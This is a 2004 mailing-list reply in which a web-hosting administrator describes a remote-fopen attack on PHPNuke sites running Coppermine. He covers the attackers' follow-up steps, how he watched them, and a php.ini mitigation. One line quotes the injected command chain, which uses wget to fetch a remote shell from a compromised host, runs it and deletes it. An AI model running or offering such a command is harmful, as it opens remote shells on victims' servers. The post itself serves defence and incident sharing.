Re: Strange Attack On A Webserver I Work On
From: Tom Walsh (mailinglist_at_expresshosting.net)
To: <email@example.com> Date: Sun, 31 Oct 2004 14:23:22 -0600
> I started to think about a Zombie network a little bit later, as it seems
> to be the only thing that would make sense aside fromt he script kiddy
> screwing up. Do you know if it's at all possible, or if there have ever
> been any vulnerabilities in PHP or PHP based software (PHPNuke for
> example, lots of users on the server use this) to execute the code? I
> know it would execute properly through apache as it's not PHP code, it's a
> binary files.... but maybe there's a way to force it to execute using the
> built in system() command or something? Just a thought.
If you have PHPNuke installations and any of them are using the Coppermine
gallery (http://www.securityfocus.com/bid/10253/info/), there is a remote
fopen exploit through this combination. I have had several customer's
servers exploited by to this type of attack. For the most part they were all
based out of Brazil using well published and documented exploits. Typically
they use the webspace of a compromised server to host a remote reverse shell
application. Using the fopen technique, they are able to inject a series of
local commands (cd /tmp; wget http://comprimisedhost.com/remoteshell;
/tmp/remoteshell &; rm /tmp/remoteshell). They then connect to the remote
shell and try various forms of local root exploits on the kernel. Depending
on the level of success they have with that, they will either:
1) if the obtain root privileges, install their own "h4x0r" index.php for
every instance of index.php and index.html and submit the sites listed to
some site that tracks "h4x0r3d" sites. They will install some sort of IRC
bouncer, or IRC script and attach it to some IRC channel as a zombie. They
will leave the remote shell running for future needs, and sign off.
2) If they are unable to get root privileges, they will typically install an
IRC bouncer and maybe an IRC zombie script, leaving the remote shell running
and then signing off.
I was able to observe their movements for a couple of days as a mock IRC
zombie, joining their IRC channels, and watching their discussions, as most
of it was in Portuguese, I wasn't able to follow too much of it.
I used the zombie information collected in the IRC channels to contact other
server admins of compromised servers, and inform them of the compromise.
Almost all had no idea that they were compromised at all and that my contact
was the first inclination of trouble. After discussions with theses admins
the common denominator seemed to be PHPNuke with Coppermine. (I believe that
Coppermine is no longer supported by the author and as such these
vulnerabilities will not be corrected.)
To prevent problems like this, I typically turn off remote fopen priviledges
in php.ini (allow_url_fopen = Off). I have only had a couple of instances
where customers have requested that it be turned on, and most of the time we
have found an alternative solution.
With reference to your previous discussion, perhaps the script kiddie was
attempting to put the file in place for downloading to another computer for
a remote attack (like the method above). Just a suggestion and thought.
Seems rather obvious, and not terribly bright, though.
If you need any additional information, please let me know and I will try
and provide you with what ever information I have available.